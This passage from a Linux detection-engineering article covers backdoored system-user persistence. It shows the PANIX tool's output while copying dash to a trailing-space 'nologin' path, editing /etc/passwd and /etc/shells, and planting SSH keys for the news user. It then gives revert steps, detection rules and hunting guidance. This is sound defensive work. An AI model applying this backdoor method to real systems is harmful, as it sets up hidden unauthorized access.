[+] Copied /bin/dash to '/usr/sbin/nologin '
[+] Modified /etc/passwd to update shell path for user: news
[+] System user backdoor persistence established for user: news

After which we can log in to the system via SSH with the news user:

> ssh news@192.168.31.129
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-130-generic x86_64)

And analyze this technique’s traces in Discover:

Upon PANIX execution, the /var/spool/news/.ssh/ directory and authorized_keys files are created and granted the correct permissions (755 and 644 respectively). Next, the /usr/sbin/nologin (with trailing space) file is created, and the /etc/passwd and /etc/shells files are modified. Upon completion, the news user is able to authenticate via SSH, with an interactive shell.

You can revert the changes made by PANIX by running the following revert command:

> sudo ./panix.sh --revert backdoor-system-user

###### [+] Reverting backdoor-system-user module... #####

[+] Removing .ssh directory for user: news
[+] Successfully removed .ssh directory for news.
[+] Reverting /etc/passwd entry for user: news
[+] Successfully reverted /etc/passwd entry for news.

[+] Removing '/usr/sbin/nologin '
[+] Successfully removed '/usr/sbin/nologin '.
[+] Reverting /etc/shells to remove 'nologin ' entry.
[+] Successfully removed 'nologin ' from /etc/shells.

After which all artifacts should be cleaned.

There are several detection- and endpoint rules set up to detect different parts of this technique:

Category	Coverage
IAM	Login via Unusual System User
Process	Unusual Interactive Shell Launched from System User
	Potential Nologin SSH Backdoor
	Masquerading Space After Filename
Detection and endpoint rules that cover backdoored system user persistence

Hunting for T1098.004 - SSH Authorized Keys: Backdoored System Users

We can hunt for this technique using ES|QL and OSQuery by focusing on identifying unauthorized SSH key additions, tampered system files, and unusual activity involving system users such as news or nobody. The following key areas are effective for detection:

Suspicious SSH Key Modifications: Monitors for changes to .ssh directories and authorized_keys files in unexpected locations, such as /var/spool/news/.ssh/ or /nonexistent/.ssh/.
Unusual File Changes: Identifies modifications to SSH-related files and directories, tracking ownership and access patterns.
Interactive Process Activity: Detects rare interactive sessions initiated by system accounts that typically lack login access.
System File Tampering: Flags modifications to /etc/passwd and /etc/shells, including unusual shell paths or additions of invalid entries like nologin .

By leveraging the Persistence via SSH Configurations and/or Keys hunt, analysts can uncover unauthorized persistence mechanisms, investigate potential abuse of system accounts, and respond effectively to these threats.

Conclusion

In this third chapter of the "Linux Detection Engineering" series, we explored various persistence techniques adversaries might leverage on Linux systems. Starting with dynamic linker hijacking, we demonstrated how manipulation of the dynamic linker through LD_PRELOAD can be abused for persistence. We then looked into loadable kernel modules (LKMs), a powerful feature that allows attackers to embed malicious code directly into the kernel, offering deep system control and persistence. We then explored the threat web shells pose, which enable scripting-based persistence and remote access, making them a significant risk in web-exposed environments. Finally, we analyzed the exploitation of default system users with non-interactive shells, revealing how attackers can leverage these often-overlooked accounts to establish persistence without creating new user entries.

These techniques underscore the ingenuity and variety of methods adversaries can employ to persist on Linux systems. You can build robust defenses and fine-tune your detection strategies by leveraging PANIX to simulate these attacks and using the tailored ES|QL and OSQuery detection queries provided.